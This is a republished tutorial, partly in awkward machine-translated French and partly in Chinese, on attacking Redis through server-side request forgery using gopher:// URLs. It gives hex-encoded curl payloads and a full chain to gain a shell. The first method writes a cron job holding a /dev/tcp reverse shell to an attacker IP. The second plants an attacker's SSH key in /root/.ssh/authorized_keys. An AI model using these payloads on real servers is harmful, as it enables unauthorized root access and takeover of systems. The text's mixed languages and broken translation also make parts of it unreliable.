Maison >base de données >Redis >Exemple d'analyse de la falsification de requêtes côté serveur SSRF dans Redis

Exemple d'analyse de la falsification de requêtes côté serveur SSRF dans Redis

WBOY
WBOYavant
2023-05-30 09:18:281312parcourir

SSRF, c'est-à-dire falsification de requête côté serveur. Les utilisateurs peuvent contrôler les ressources, protocoles, chemins, etc. demandés par le serveur. Cela peut provoquer des attaques SSRF.

Cet article se concentre sur l'étude de l'attaque SSRF sur le service Redis via le protocole gopher, puis getshell.

Format du protocole Gopher

Comprenez d'abord ce qu'est le protocole Gopher et à quoi ressemble le format :

gopher://://_ suivi des données TCP stream

Lorsque nous testons l'attaque de Redis, nous pouvons utiliser le curl fourni avec Linux pour les tests.

Si vous utilisez Centos, afin d'assurer le succès de l'expérience, il est préférable de désactiver le selinux de Centos.

Fermez Selinux :

setenforce 0

Attaque redis

(1) Configurez l'environnement expérimental

Installez simplement Centos7 sur la machine virtuelle.

installation de redis :

wget http://download.redis.io/releases/redis-4.0.6.tar.gz //Téléchargez le package compressé redis

yum install gcc //Gcc est nécessaire lors de l'installation de make

tar -xzvf redis-4.0.6.tar.gz //Décompressez le package compressé cd redis-4.0.6 //Entrez le répertoire du package compressé

make MALLOC=libc //Compile

cd src //Après le la compilation est terminée, elle générera un dossier src, entrez dans le dossier src

make install //Install

redis run:

Sous le redis-4.0.6 répertoire , redis.conf est le redis initial fichier de configuration

répertoire redis-4.0.6/src , il y a deux fichiers exécutables les plus importants :

redis-server -- serveur

redis-cli -- client

exécutez directement le programme serveur, vous peut démarrer le service Redis.

./redis-server

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Exécutez le programme client directement et connectez-vous au service Redis local par défaut :

./redis-cli

(2) Exploration et introduction préliminaires

Essayez d'attaquer Redis sans mot de passe :

Nous devons d'abord ouvrir le paquet logiciel de capture pour capturer le package de données pour communiquer avec Redis.

Sous Linux, vous pouvez utiliser tcpdump pour capturer le trafic :

tcpdump -i lo -s 0 port 6379 -w redis.pcap

Si vous souhaitez capturer le trafic de l'interface locale, veuillez noter que lo n'est pas eth0

Nous nous connectons d'abord, puis effectuons l'opération de clé définie :

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Capturez le tcpdump Exportez le package, ouvrez-le avec Wireshark et suivez le flux TCP

Regardez uniquement les données que nous saisissons, pas les données renvoyées par le serveur. Vous ne pouvez voir que quelques lignes :

. Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Sous "Afficher et enregistrer les données sous" Emplacement, sélectionnez Hex dump, vous obtiendrez les données suivantes :

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

La case rouge est ce que vous utiliserez plus tard charge utile

Copiez tout, utilisez l'éditeur à supprimer sauf la case rouge Toutes les données non pertinentes sauf

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Ajoutez ensuite un signe de pourcentage avant chaque valeur hexadécimale et alignez-le sur une seule ligne :

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Construct curl request :

curl -v 'gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%34%0d%0a%6b%65%79%31%0d%0a%24%36%0d%0a%76%61%6c%75%65%31%0d%0a' --output -

Echo :

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Clé de requête :

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

La clé peut être définie avec succès.

Essayez d'attaquer Redis en utilisant un mot de passe :

Configurez d'abord Redis pour exiger un mot de passe pour vous connecter :

Modifiez le fichier de configuration redis.conf sous redis et recherchez le mot-clé requirepass .

Par défaut, requirepass est commenté, supprimez le symbole de commentaire , puis remplissez le mot de passe que vous souhaitez définir pour redis après requirepass

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Après la configuration, la commande pour démarrer redis est :

./redis-server redis配置文件路径

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Essayez d'attaquer Redis avec un mot de passe :

Tout d'abord, activez tcpdump pour capturer les paquets, puis effectuez l'opération dans la ligne de commande Redis :

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Capturez à nouveau le trafic, opérez comme avant , et constatez que la vérification du mot de passe signifie ajouter Il existe une autre commande d'authentification :

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

重复上文的步骤即可。

(2)GetShell:

接下来讲重点:通过 set key GetShell:

思路:

(1)将反弹shell命令写到定时任务里,攻击机只需要开一个netcat端口即可。

(2)写入ssh-keygen,进行ssh免密登录。

一个个细细道来。

(1)定时任务反弹shell

基本要求:

redis需要是以 root 权限运行,不然写不到 /var/spool/cron/ 目录下

1.首先得知道 Linux 下的定时任务是个什么东西:

Linux下设置定时任务命令为 crontab

配置文件为 /etc/crontab

下面这张图是配置文件里的内容,很好的说明了 crontab 配置的格式

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

这个配置文件应该只是供参考用的,我们的定时任务需要自己手动写在 /var/spool/cron/ 目录下

如果我们要每分钟执行一次命令 echo1 > /tmp/1.txt

则可以这么操作:

vim /var/spool/cron/root //root是文件名,一般以执行的用户命名

在文件中写入

* * * * * root echo1 > /tmp/1.txt

保存退出后,重启 crontab 服务:

systemctl restart crond.service

即可每一分钟执行一次该命令

2.接着要知道linux下通过输入输出流反弹shell

 命令:

/bin/bash -i >& /dev/tcp/192.168.1.105/8888 0>&1

 直接看效果:Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

这里巧妙的结合了Linux中 文件描述符、重定向符和 /dev/

文件描述符 1 表示标准输入

文件描述符 2 表示标准输出

/bin/bash -i 表示的是调用bash命令的交互模式,并将交互模式重定向到 /dev/tcp/192.168.1.105/8888 中。

重定向时加入一个描述符 &,表示直接作为数据流输入。不加 & 时,重定向默认是输出到文件里的。

做个实例就清晰明了了

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

/dev/tcp/ip地址/端口号 是linux下的特殊文件,表示对这个地址端口进行tcp连接

这里我们设置成攻击机监听的地址

最后面的 0>&1 。此时攻击机和靶机已经建立好了连接,攻击机的输入就是从标准输入0传送至靶机

通过重定向符,重定向到 1(标准输入)中,由于是作为 /bin/bash 的标准输入,所以就执行了系统命令了。

3.还需要知道Redis如何写入文件

Redis 中可以导出当前数据库中的 key 和 value

并且可以通过命令配置导出路径和文件名:

config set dir /tmp/test      //设置导出路径
config set dbfilename root    //设置导出文件名
save                          //执行导出操作

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

可以看到,格式非常乱。不过还好linux中的cron不会报错,只要读到一行正确配置即可执行。

通过crontab定时任务 getshell

为了能让linux能够正确读到一行,我们在 set key 的时候手动添加 \n(换行)

redis语句:

config set dir /var/spool/cron
config set dbfilename root
set test1 "\n\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.1.105/8888 0>&1\n\n\n"
save

转换成 gopher协议,进行curl请求:

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

成功写入:

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

成功getshell:

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

注意:这里有一个坑点。

cron文件不需要写用户名,不然会报错:

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

(2)ssh免密登录

在linux中,ssh可配置成免密登录。

需要修改 ssh 配置文件 /etc/ssh/sshd_config

#StrictModes yes

改为

StrictModes no

然后重启sshd即可

免密登录条件:

客户端生成公钥和私钥

将公钥上传至服务端 即可

在SSRF利用中,同样需要root权限运行 redis

如果不是root权限,需要能够 ssh 登录的用户权限运行 redis

正常免密登录流程:

1.客户端先生成公钥和私钥

使用工具 ssh-keygen:

ssh-keygen -t rsa

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

执行完毕后将会在 用户家目录中的 .ssh文件夹中放有公钥与私钥 文件

有.pub后缀的就是公钥,没有.pub后缀的就是私钥

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

2.上传公钥至服务器

将公钥上传至服务端的 /root/.ssh目录下

嫌麻烦可以用 ssh-copy-id工具

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

3.重命名文件为authorized_keys

文件名要重命名为 authorized_keys

authorized_keys 文件内容如下:

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

如果有多台客户端需要免密登录,新起一行,新行中写对应的客户端的公钥值即可

类似这样:

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

4.免密登录

传好后即可免密登录:

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

ssh免密登录 getshelll

我们知道了要写入的文件位置、要写入的内容(公钥事先生成好),我们可以构造redis语句了:

//先配置路径
config set dir /root/.ssh      
config set dbfilename authorized_keys
//写入公钥
set test2 "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/unZTA0b1HtFsgjXlWM4Bt65Ubx72z/dkLJrqCJJpfsD+F27uix6J3GWuIKaHurabFR40eJ2EqWWs/FCKpBvnJ+msSWWyn9C8WyWY19HydE9ldIO8SjdoOfQ7pf0Q2dwMKSr6F3L8Dy04ULQsCwGEu8X0fdwCZIggagTwGXWZS/M89APJKSVn7v5jhgRy/dCSGwN5wwFakSQSbWtW396V/iP2svU7IAznqIX4tyZII/DX1751LqA0ufVzIoK1Sc9E87swjupDD4ZGxX6ks676JYQHdZSYHoQioM9kWVsB2ntBfBsIFHu+yX1V9tkTTB0E5eaWuitzzsi8xfAz0xBag3f8wiPvlbuLV/TwOXHABGt1HQNhg5wnfZYnebRNdn5QeDXNY1XtLjc3T9UTYe7FmT6hG+RvI+7OSywDIvaGq+PjAQN1KPOBFJtNG5iha3bYds05zR5LCM8ZzLRTcKP9Djo79fum8iOC8DjrxVp49RilDobr1/oZzn+91YJIq1M= root@kali\n\n\n"
//保存
save

改成gopher协议格式: 

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

查看 authorized_keys 文件:

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis 

成功免密登录:

Exemple danalyse de la falsification de requêtes côté serveur SSRF dans Redis

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration:
Cet article est reproduit dans:. en cas de violation, veuillez contacter admin@php.cn Supprimer